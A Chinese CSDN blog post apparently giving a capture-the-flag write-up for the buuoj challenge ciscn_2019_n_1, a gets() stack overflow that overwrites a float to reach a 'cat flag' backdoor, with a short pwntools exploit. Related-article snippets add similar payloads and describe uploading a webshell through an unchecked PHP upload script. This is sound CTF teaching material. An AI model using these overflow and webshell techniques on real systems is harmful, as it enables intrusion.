buuoj ciscn_2019_n_1 writeup

最新推荐文章于 2024-07-04 23:57:36 发布
最新推荐文章于 2024-07-04 23:57:36 发布
阅读量113 收藏
点赞数 1
分类专栏: write up 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73605862/article/details/130919118
版权
文章描述了一次针对64位NX保护开启程序的PWN攻击,通过分析main函数和func()中的gets()函数,发现栈溢出漏洞。利用该漏洞,通过计算使v2达到特定十六进制值(0x41348000),触发后门函数catflag,最终编写并发送exploit来获取flag。
摘要由CSDN通过智能技术生成

题目(四):
【题型】PWN
【题目】ciscn_2019_n_1
【来源】(buuoj)https://buuoj.cn/challenges#ciscn_2019_n_1
【思路】通过栈溢出使v2达到某个值实行后门函数
【具体步骤】
Step1:checksec一下文件,发现是一个64位的NX打开的程序。
在这里插入图片描述

Step2:将文件放到IDApro下进行静态调试。
在这里插入图片描述

Step3:看到main函数,查看伪代码(F5,如果键被占用,Fn+F5),然后发现有一个函数叫做func(),进入这个函数。
在这里插入图片描述

Step4:查看函数,发现有一个gets()函数,栈的大小只有44,但是v1,点进去查看有0x30-0x4,又因为当v2=11.28125会有cat flag这个后门,所以只要让v1栈溢出可以使v2的值改变。计算11.28125的十六进制为0x41348000.
在这里插入图片描述
在这里插入图片描述

Step5:编写exp,得到flag。
源码为:

from pwn import *
p=remote("node4.buuoj.cn",27628)
ans=0x41348000
payload=b'a'*44+p64(ans)
p.sendline(payload)
p.interactive()

在这里插入图片描述

22的卡卡
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4350
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
ciscn_sshop:参赛所用的sshop平台
05-10
2018ciscn sshop 2018ciscn半决赛已经结束了,就把题目放出来好了 题目是我和队友一起出的,可能一开始没设计好,有点偏难,但也是第一次出题,也花了蛮多心血,就记录一下 题目思路 主要是借鉴了0ctf的那道条件竞争...
BUU ciscn_2019_n_1
xieyichensss的博客
03-19 399
**BUUOJ ciscn_2019_n_1** (今天来晚了,嘿嘿,出去唱歌了,被淋成落汤鸡) 1.老规矩,将其checksec和file一下,发现NX保护被打开了,且是64为的ELF文件。 2.那就放入IDA64内分析,按fn+F5查看c的代码,发现一个func()的函数,双击进入 cat flag直接映入眼帘,我tm直接暗喜,有后门函数了诶,那就不慌了,直接看c的代码。 3.要想将后门函数覆盖到返回地址,那就必须要v2=11.28125,可是又没有v2的gets函数,我们...
BUUCTF-PWN】4-ciscn_2019_n_1
最新发布
燕麦葡萄干的博客
07-04 366
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUU-ciscn_2019_n_1
qq_45771413的博客
04-27 215
检查保护 IDA 函数主体很简单:初始化v2为0.0 ;输入数字存进v1,然后让v2和11.28125进行对比,相同则自动 cat flag 解题 gets函数明晃晃地摆在主函数里,准备对v1动手。 可以看到v1长度 0x30,下面v2的长度为 0x4 进去瞅瞅:v1和v2紧挨着,而且v1覆盖v2的空间 那exp思路就很清晰了,把v1到v2首地址之间的空间都填满,然后填进值11.28125,这样就能覆盖v2初始化的0.0 从而满足条件跳转猫flag。 Tips: 关于11.28125的输入: 浮点输入
buu ciscn_2019_n_1
m0_63253040的博客
09-11 116
当v2为11.28125时执行cat /flag,所以我们令v1覆盖v2的地址使其为11.28125。11.28125的十六进制为0x41348000。溢出距离为0x30-0x4。
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 642
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
BUUCTF_PWN - ciscn_2019_n_1
weixin_46009088的博客
12-06 336
BUUCTF_PWN - ciscn_2019_n_1 查看程序保护模式和文件基本信息 有个NX保护,如果要写shellcode有点麻烦,文件是64位小端程序(各条保护详情介绍请看胡写瞎写(1) pwntools常见命令) IDA载入 shift+F12寻找敏感字符串,发现一个cat /flag 查看该字符串的交叉引用: 查看该函数: 很明显这是通过栈溢出覆盖v2的值变成11.28125 拿到 flag 我们发现gets()并且v2是在 rsp + 2Ch,那就是说只要输入超过44个字符便可以覆盖.
ADS Writeup_1_ads_
09-29
《高级数据结构解析1》(ADS Writeup_1)是一篇深入探讨高级数据结构的分析报告,主要聚焦于这些结构在计算机科学中的重要性、应用以及优化策略。数据结构是编程和算法设计的基础,它影响着程序的效率、可读性和可...
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
加密过程中,数据(明文)被公钥中的两个大素数的乘积(N)和欧拉函数φ(N)的乘积(e)所模指数运算。解密时,用私钥中的另一个大素数d(与e互为模逆元)对密文进行模指数运算。 在“ReverseRSA”这个场景中,我们...
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目中,您的目标是使用来自6位参与者的...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
ADS Writeup_ads_
10-03
与数组相比,链表不需要连续的内存空间,插入和删除操作更高效,但访问元素需要遍历链表,时间复杂度为O(n)。 **三、栈** 栈是一种后进先出(LIFO)的数据结构,主要用于临时存储和检索数据。常见的操作有push...
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 1004
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
BUUCTF - PWN】ciscn_2019_n_1
古月浪子的博客
03-19 3575
checksec一下 IDA打开,发现如果满足的条件达成,就能get flag 找到栈溢出漏洞,输入可以覆盖到v2 写代码把11.28125在内存中的十六进制表示出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ...
PWN学习记录(4)BUUCTF-ciscn_2019_n_1
m0_58824086的博客
08-05 145
下载题目得到ciscn_2019_n_1,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将文件放入IDA中查看,打开字符串窗口。没有发现 /bin/sh,但找到了cat flag.txt。打开终端,输入vim 1.py 创建一个python文件(命名随意)NX enabled如果这个保护开启就是意味着栈中数据没有执行权限。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。双击cat flag.text。打开main,F5反编译。
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 625
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ```php <?php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . "<br />"; } else { echo "Upload: " . $_FILES["upload"]["name"] . "<br />"; echo "Type: " . $_FILES["upload"]["type"] . "<br />"; echo "Size: " . ($_FILES["upload"]["size"] / 1024) . " Kb<br />"; move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的文件。我们可以尝试上传一些常见的恶意文件,比如 `webshell`。 我们可以在本地创建一个 `webshell.php` 文件,然后上传到服务器上的 `upload` 目录。上传完成后,我们可以访问 `http://xxx.xxx.xxx.xxx/upload/webshell.php` 来执行我们上传的 `webshell`。 最后,我们需要注意的是,该上传脚本没有做任何安全性检查,这意味着我们可以上传任意大小的文件,这可能会影响服务器的性能,甚至导致服务器崩溃。因此,在实际应用中,我们应该对上传的文件大小进行限制,同时对上传的文件类型进行检查,从而确保服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值